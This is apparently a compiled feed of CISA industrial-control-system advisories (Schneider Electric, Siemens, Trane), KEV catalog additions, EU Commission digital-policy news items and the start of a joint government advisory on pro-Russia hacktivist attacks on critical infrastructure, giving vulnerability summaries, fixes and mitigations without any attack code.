Electric CPCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-03-10 Date Revision Summary 2026-03-10 1 Original Release 2026-03-17 2 Initial CISA Republication of Schneider Electric SEVD-2026-069-05 advisory Legal Notice and Terms of Use

View CSAF Summary Schneider Electric is aware of a vulnerability in its SCADAPack™ x70 RTU products. The SCADAPack™ 47xi, SCADAPack™ 47x and SCADAPack™ 57x product are Remote Terminal Units that provide communication capabilities for remote monitoring and control. Failure to apply the remediations provided below may risk unauthorized access to your RTU, which could result in the possibility of denial of service and loss of confidentiality, integrity of the controller. The following versions of Schneider Electric SCADAPack and RemoteConnect are affected: SCADAPack™ vers:generic/ SCADAPack™ firmware vers:intdot/<9.12.2, 9.12.2, vers:intdot/<9.12.2, 9.12.2 () RemoteConnect vers:generic/ CVSS Vendor Equipment Vulnerabilities v3 9.8 Schneider Electric Schneider Electric SCADAPack and RemoteConnect Improper Check for Unusual or Exceptional Conditions Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: France Vulnerabilities Expand All + CVE-2026-0667 CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when communicating over the Modbus TCP protocol. View CVE Details Affected Products Schneider Electric SCADAPack and RemoteConnect Vendor: Schneider Electric Product Version: SCADAPack™ 57x All Versions, RemoteConnect Versions prior to R3.4.2 Product Status: fixed, known_affected Remediations Vendor fix Version R3.4.2 (Firmware version 9.12.2) of SCADAPack™ 47x and SCADAPack™ 47xi includes a fix for this vulnerability and is available for download here: https://www.se.com/ww/en/download/document/RemoteConnect/ Vendor fix Version R3.4.2 of RemoteConnect includes a fix for this vulnerability and is available for download here: https://www.se.com/ww/en/download/document/RemoteConnect/ Mitigation If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: Follow the information according to SCADAPack™ Security Guidelines in section 8.3 Secured Communication. Also, apply the following standard practices to reduce the risk of exploit: • Setup network segmentation and implement the RTU firewall service to block all unauthorized access to services • Disable the logic debug service. Mitigation Follow the information according to SCADAPack™ Security Guidelines in section 8.3 Secured Communication. Also, apply the following standard practices to reduce the risk of exploit • Setup network segmentation and implement the RTU firewall service to block all unauthorized access to services. • Disable the logic debug service. Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments Schneider Electric CPCERT reported this vulnerability to CISA. General Security Recommendations We strongly recommend the following industry cybersecurity best practices. * Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. * Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. * Place all controllers in locked cabinets and never leave them in the “Program” mode. * Never connect programming software to any network other than the network intended for that device. * Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. * Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. * Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric [Recommended Cybersecurity Best Practices](https://www.se.com/us/en/download/document/7EN52-0390/) document. For More Information This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process. For further information related to cybersecurity in Schneider Electric's products, visit the company's cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp LEGAL DISCLAIMER THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION About Schneider Electric Schneider's purpose is to create Impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in Sustainability and Efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI enabled Industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-041-01 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric CPCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-02-10 Date Revision Summary 2026-02-10 1 Original Release 2026-03-17 2 Initial CISA Republication of Schneider Electric CPCERT SEVD-2026-041-01 advisory Legal Notice and Terms of Use

View CSAF Summary The SICAM SIAPP SDK contains multiple vulnerabilities that could allow an attacker to disrupt the customer-developed SIAPP or its simulation environment. Potential impacts include denial of service within the SIAPP, corruption of SIAPP data, or exploit the simulation environment. These vulnerabilities are only exploitable if the API is used improperly or hardening measures are not applied. Siemens has released a new version for SICAM SIAPP SDK and recommends to update to the latest version. The following versions of Siemens SICAM SIAPP SDK are affected: SICAM SIAPP SDK vers:intdot/<2.1.7 CVSS Vendor Equipment Vulnerabilities v3 7.4 Siemens Siemens SICAM SIAPP SDK Out-of-bounds Write, Stack-based Buffer Overflow, Improper Handling of Length Parameter Inconsistency, External Control of File Name or Path Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-25569 An out-of-bounds write vulnerability exists in SICAM SIAPP SDK. This could allow an attacker to write data beyond the intended buffer, potentially leading to denial of service, or arbitrary code execution. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-25570 The SICAM SIAPP SDK does not perform checks on input values potentially resulting in stack overflow. This could allow an attacker to perform code execution and denial of service. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-25571 The SICAM SIAPP SDK client component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-130 Improper Handling of Length Parameter Inconsistency Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.1 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-25572 The SICAM SIAPP SDK server component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-130 Improper Handling of Length Parameter Inconsistency Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.1 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-25573 The affected application builds shell commands with caller-provided strings and executes them. An attacker could influence the executed command, potentially resulting in command injection and full system compromise. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-73 External Control of File Name or Path Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-25605 The affected application performs file deletion without properly validating the file path or target. An attacker could delete files or sockets that the affected process has permission to remove, potentially resulting in denial of service or service disruption. View CVE Details Affected Products Siemens SICAM SIAPP SDK Vendor: Siemens Product Version: SICAM SIAPP SDK Product Status: known_affected Remediations Vendor fix Update to V2.1.7 or later Relevant CWE: CWE-73 External Control of File Name or Path Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. Maxime Rossi Bellom of Secmate reported these vulnerabilities to Siemens. General Recommendations Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design. Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment. As a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment. Recommended security guidelines can be found at: https://www.siemens.com/gridsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-903736 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-03-10 Date Revision Summary 2026-03-10 1 Publication Date 2026-03-17 2 Initial CISA Republication of Siemens ProductCERT SSA-903736 advisory Legal Notice and Terms of Use

Equipment for smart European cable systems - Works Anonymous (not verified) Tue, 03/17/2026 - 08:45 Opening: 17 March 2026 Closing: 30 June 2026 This call supports the upgrade of existing submarine telecommunications/digital infrastructures to “smart capabilities” enabling applications that monitor them as well as other surrounding critical infrastructures (e.g. power cables, pipelines, etc.) and/or their vicinity. Main link https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni… Related topics Digital connectivity Connecting Europe Facility Funding for Digital {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

Backbone connectivity for Digital Global Gateways - Studies Anonymous (not verified) Tue, 03/17/2026 - 08:19 Opening: 17 March 2026 Closing: 30 June 2026 This call for proposals will fund studies related to the deployment/significant upgrade of backbone networks that address risks, vulnerabilities and dependencies in the EU backbone infrastructure. GettyImages © Dragon Claws Main link https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni… Related topics Digital connectivity Connecting Europe Facility Funding for Digital {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-47813 Wing FTP Server Information Disclosure Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Open EU Foundry status granted to innovative chiplet facility Anonymous (not verified) Mon, 03/16/2026 - 10:40 The Commission has granted the Open EU Foundry (OEF) status to Silicon Box in Novara, Italy. GettyImages © Nikola Ilic - E+ Under the European Chips Act, the OEF status is granted to new or upgraded innovative semiconductor manufacturing facilities. The status provides benefits to semiconductor facilities including administrative support, faster construction approvals and priority access to pilot lines under the Chips for Europe Initiative. This helps deepen European semiconductor supply chain resilience and boost innovation. Silicon Box’s project is a significant milestone in strengthening Europe’s semiconductor industry through its new advanced semiconductor packaging and testing facility. The facility will integrate multiple dies or chiplets - small, modular semiconductor blocks that perform specific functions - into a single package, effectively creating a multi-chip module that behaves like a single chip, using panel level packaging. Panel level packaging uses a more efficient large-panel approach to packaging, enabling higher output and lower cost compared to traditional methods in the final stage of the chip making process. The facility will also test chips at panel-level, grouping multiple chiplets into a single panel, enabling more comprehensive quality verification before final assembly. The project will provide an important base in Europe for developing innovative technologies, products and system solutions for the semiconductors key to powering AI, electric and autonomous vehicles, data centres, as well as supercomputing applications. The plant is expected to reach full capacity in 2033. This OEF status recognition follows four semiconductor projects across the EU which have previously been awarded OEF or IPF (integrated production facility) status in October 2025: ESMC in Germany (OEF) Ams-OSRAM in Austria (IPF) Infineon Technologies Dresden in Germany (IPF) STMicroelectronics in Italy The decision to grant OEF follows the Commission state aid decision concerning Silicon Box. Related topics Advanced Digital Technologies Electronics Chips Act Semiconductors {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-3909 Google Skia Out-of-Bounds Write Vulnerability CVE-2026-3910 Google Chromium V8 Unspecified Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, execute arbitrary commands, or perform a denial-of-service on the product. The following versions of Trane Tracer SC, Tracer SC+, and Tracer Concierge are affected: Tracer SC Tracer SC+ Tracer Concierge CVSS Vendor Equipment Vulnerabilities v3 8.1 Trane Trane Tracer SC, Tracer SC+, and Tracer Concierge Use of a Broken or Risky Cryptographic Algorithm, Memory Allocation with Excessive Size Value, Missing Authorization, Use of Hard-coded Credentials, Use of Hard-coded, Security-relevant Constants Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Ireland Vulnerabilities Expand All + CVE-2026-28252 A Use of a Broken or Risky Cryptographic Algorithm vulnerability in Trane Tracer SC, Tracer SC+, and Tracer Concierge could allow an attacker to bypass authentication and gain root-level access to the device. View CVE Details Affected Products Trane Tracer SC, Tracer SC+, and Tracer Concierge Vendor: Trane Product Version: Trane Tracer SC:

Apply AI webinars sectoral deep dive - Agrifood, climate & environment Anonymous (not verified) Thu, 03/05/2026 - 14:30 19 March 2026 This session focuses on how the Commission, together with the private sector, aims to accelerate AI adoption across the agrifood sector, as well as the intersection between AI, climate and environment. This is part of a series of Apply AI thematic webinars. Join the live stream on our YouTube channel to find out how farmers, industry, researchers and other stakeholders can contribute to shaping priorities for Europe’s agrifood, climate and environment ecosystems. Engage in the conversation by submitting questions in advance or during the session via Slido. Agenda 14:00 - 14:45 (CET) Apply AI Agrifood 14:45 - 15:00 (CET) Short break 15:00 - 15:45 (CET) Apply AI Climate & Environment Download the slides for both sessions below. Moderator Andrea Hak, Stakeholder Communication Expert at the AI Office, DG CONNECT Speakers - Agrifood Pierluigi Londero, Head of Unit Data Governance, DG AGRI Doris Marquardt, Programme Officer EU Policies, Contact person for Agriculture in the DG, DG CONNECT Speakers - Climate & Environment Tsitlakidis Charalampos, Head of Sector, Destination Earth, DG CONNECT Irina Sandu, Director of Destination Earth (DestinE), European Centre for Medium-Range Weather Forecasts (ECMWF) Agrifood The webinar will discuss how the Commission aims to accelerate AI adoption across the agrifood sector and translate innovation into impact on the ground, enhancing sectorial competitiveness and public goods. Among others, a marketplace for AI-based solutions for the agri-food sector will be introduced and funding will be devoted to capacity building in the development of agriculture specific foundation models (e.g., LLMs). AI is already reshaping agricultural production and can transform the way food is produced, benefiting the environment, climate and people. AI supports farmers, for instance through AI-driven advisory tools and handy applications that turn data into tailored recommendations. These help producers to make better and faster decisions accounting for local conditions, and increasing resource efficiency, e.g. saving water, and effectiveness. A new wave of opportunities is emerging, boosting precision farming, powering robots, and smartening machinery for field work. AI can also contribute to reducing reporting obligations and other administrative burdens. Climate & Environment AI has a long track record in environmental monitoring, forecasting, and Earth observation. It can enhance early-warning systems and aid disaster response as well as decision-making for resilience and climate preparedness. Ground-breaking initiatives such as Destination Earth provide high-resolution and interactive simulations with unprecedented predictive power through AI-driven applications. Downloads Apply AI Climate & Environment (PDF) Download Related topics Creating a digital society Environment Smart and Sustainable Communities Artificial intelligence {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

Commission holds first meeting of Special Panel on child safety online Anonymous (not verified) Thu, 03/05/2026 - 08:08 European Commission President Ursula von der Leyen hosted the first meeting of the Special Panel on child safety online. AdobeStock ©myboys The panel, announced in the 2025 State of the Union address, will provide expert recommendations to better protect and empower children online and will explore the need for potential harmonised age restrictions to access social media. President Ursula von der Leyen said: For decades, we have made the real world safer for children and we must do the same in the digital world. The positive opportunities that technology offers cannot come at the cost of their safety, health or happiness. In Europe, tech platforms already have a responsibility to ensure the safety of users and we will continue to ensure they do so. But we must also do more to protect and empower our young people online. That is why I have convened this panel: to forge a strong, realistic, European approach to keep our children safe in the digital age. Read the full press release and find further information about the special panel on child safety online. Related to child safety online, you can also read more about: the Digital Services Act (DSA) and its Guidelines on the protection of minors the Safer Internet Centres under the Better Internet for Kids Strategy (BIK+) the Cyberbullying Action Plan the EU Age Verification solution the Communication on a comprehensive approach to mental health the EU rules to combat child sexual abuse online Related topics Better Internet for Children Strengthening trust and security Online platforms and e-commerce {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

Commission seeks feedback for draft guidance to assist companies in applying the Cyber Resilience Act Anonymous (not verified) Wed, 03/04/2026 - 09:10 Opening: 03 March 2026 Closing: 31 March 2026 The draft guidance clarifies the obligations and the scope of the rules with a particular focus on facilitating compliance by microenterprises and small and medium-sized enterprises. AdobeStock © ipopba Main link https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/16959… Related topics Cybersecurity {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

Summary Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally. FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists: U.S. Department of Energy (DOE) U.S. Environmental Protection Agency (EPA) U.S. Department of Defense Cyber Crime Center (DC3) Europol European Cybercrime Centre (EC3) EUROJUST – European Union Agency for Criminal Justice Cooperation Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) Canadian Centre for Cyber Security (Cyber Centre) Canadian Security Intelligence Service (CSIS) Czech Republic Military Intelligence (VZ) Czech Republic National Cyber and Information Security Agency (NÚKIB) Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK) French National Cybercrime Unit – Gendarmerie Nationale (UNC) French National Jurisdiction for the Fight Against Organized Crime (JUNALCO) German Federal Office for Information Security (BSI) Italian State Police (PS) Latvian State Police (VP) Lithuanian Criminal Police Bureau (LKPB) New Zealand National Cyber Security Centre (NCSC-NZ) Romanian National Police (PR) Spanish Civil Guard (GC) Spanish National Police (CNP) Swedish Polisen (SC3) United Kingdom National Cyber Security Centre (NCSC-UK) The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include Water and Wastewater Systems, Food and Agriculture, and Energy. The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Threat Overview and Advisories webpage. Download the PDF version of this report: Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure (PDF, 1.53 MB ) Background and Development of Pro-Russia Hacktivist Groups Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support. Cyber Army of Russia Reborn The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see Appendix B: Additional Designators Used for Cited Groups)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024. In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine. CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors. In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms. The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement. NoName057(16) The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool DDoSia, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets. Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host DDoSia and share materials and TTPs with their followers. In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024. Z-Pentest Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media. Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners. Sector16 Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged 